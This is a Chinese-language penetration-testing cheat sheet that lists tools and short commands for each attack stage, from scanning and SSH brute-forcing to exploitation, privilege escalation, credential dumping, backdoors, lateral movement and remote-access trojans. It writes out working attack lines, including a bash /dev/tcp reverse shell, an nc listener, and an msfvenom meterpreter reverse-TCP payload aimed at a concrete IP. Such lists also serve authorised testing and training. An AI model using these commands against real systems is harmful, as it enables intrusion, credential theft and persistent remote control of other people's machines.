前言
本文是滲透測試各階段工具和快速用法速查筆記,將會持續更新。轉載於https://mp.weixin.qq.com/s/jqRqrWDp1vJAMtxx6Yr9cw。
站點信息收集
1 |
Google |
快速探測存活主機
nmap
1 |
nmap 172.18.2.1/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt |
格式化輸出存活ip,做后續詳細掃描使用
https://github.com/echohun/tools/blob/master/web%E6%89%AB%E6%8F%8F/nmap_clean_data.py
1 |
-sS:使用SYN方式掃描,默認用的是-sT方式,即TCP方式,需要完成完整的三次握手,比較費時,SYN就比較快一些了; |
Ipscan
快速探測端口
masscan的發包速度非常快,在windows中,它的發包速度可以達到每秒30萬包;在Linux中,速度可以達到每秒160萬。masscan在掃描時會隨機選擇目標IP,所以不會對遠程的主機造成壓力。
https://www.freebuf.com/sectool/112583.html
1 |
masscan 172.18.2.1 -p1-65535 --rate=10000 |
郵箱搜集工具
EmailSniper
子域名收集
SubDominscanner
指紋收集
whatweb -v http://baidu.com
web目錄掃描
御劍
Dirbuster
https://www.jianshu.com/p/79c7b1eda56e
webpathbrute
漏洞掃描
wvs
burpsuite
nessus(強烈推薦)
xray
爆破
hydra
1 |
hydra -V -l fakeroot -P top100.txt 172.18.2.177 ssh |
ncrack
1 |
ncrack -vv -d10 -user root -P top100.txt 172.18.2.177 -p ssh -g CL=10,at=3 |
medusa
1 |
medusa -v 6 -h 172.18.2.177 -u fakeroot -P top100.txt -M ssh -t 10 -O out.txt |
漏洞利用
metasploit
burpsuite
sqlmap
xxer (xml注入利用工具) https://github.com/TheTwitchy/xxer
ysoserial (反序列化利用工具) https://github.com/frohoff/ysoserial
Struts2-Scan (struts2歷史漏洞掃描和利用) https://github.com/HatBoy/Struts2-Scan
weblogicScanner (weblogic歷史漏洞掃描利用) https://github.com/0xn0ne/weblogicScanner
exphub (常見web框架cve利用) https://github.com/zhzyker/exphub
cve,cms,中間件,OA系統漏洞exp合集
https://github.com/mai-lang-chai/Middleware-Vulnerability-detection
webshell
菜刀
蟻劍
冰蠍
cobalt strike
普通反彈shell
1 |
bash -i >& /dev/tcp/HOST/PORT 0>&1 |
加密shell
1 |
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes |
nc
1 |
攻擊機 nc -lvp 4444 |
提權
各類exp
典型通殺:臟牛CVE-2016-5195
Metasploit
本地漏洞掃描工具
windows/linux exploit suggester
本地口令獲取和破解
hash-identifier 判斷哈希類型
mimikatz
Mimipenguin
1 |
--hash-type 0 --attack-mode 0 |
本地信息收集
Linuxprivchecker
LinEnum
后門
常見后門手法
metasploit
1 |
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f elf -o reverse_tcp_linux64 |
python直連反彈shell
http://next.uuzdaisuki.com/2018/06/17/%E5%9F%BA%E4%BA%8Epython%E7%9A%84%E7%9B%B4%E8%BF%9Eshell%E5%92%8C%E5%8F%8D%E5%B0%84shell/
其他語言直連反彈shell
windows常見奇淫技巧后門手法
http://next.uuzdaisuki.com/2018/06/18/windows%E5%B8%B8%E7%94%A8%E5%90%8E%E9%97%A8%E6%8A%80%E6%9C%AF%E5%8F%8A%E9%98%B2%E8%8C%83/
內網橫向滲透
Hydra
nessus
metasploit
nmap
powersploit
Empire
Psnmap
lcx
ew
tunna
proxychains
FRP
N2N
內網命令執行和文件訪問
at
schtasks
telnet
sc
wmic
wmiexec.vbs
python impacket wmiexec.py
psexec
遠程桌面
arp欺騙
Cain
Arpspoof
遠控
pupy類遠控
teamview
pcanywhere
radmin
手機端
DroidJack
Dendroid
典型windows-rce
ms17-010 基本通殺
cve-2019-0708 開放3389情況 windows7及之前通殺
實用工具
q-dir 文件管理工具,可開四個窗口
beyond compare 文件/文本比較工具
cmder 命令行工具
everything 文件搜索工具
navicat 數據庫連接工具,支持超多種類數據庫,支持導出數據,甚至提供拖庫的tunnel.php等
懸劍3.0 超齊全windows工具庫系統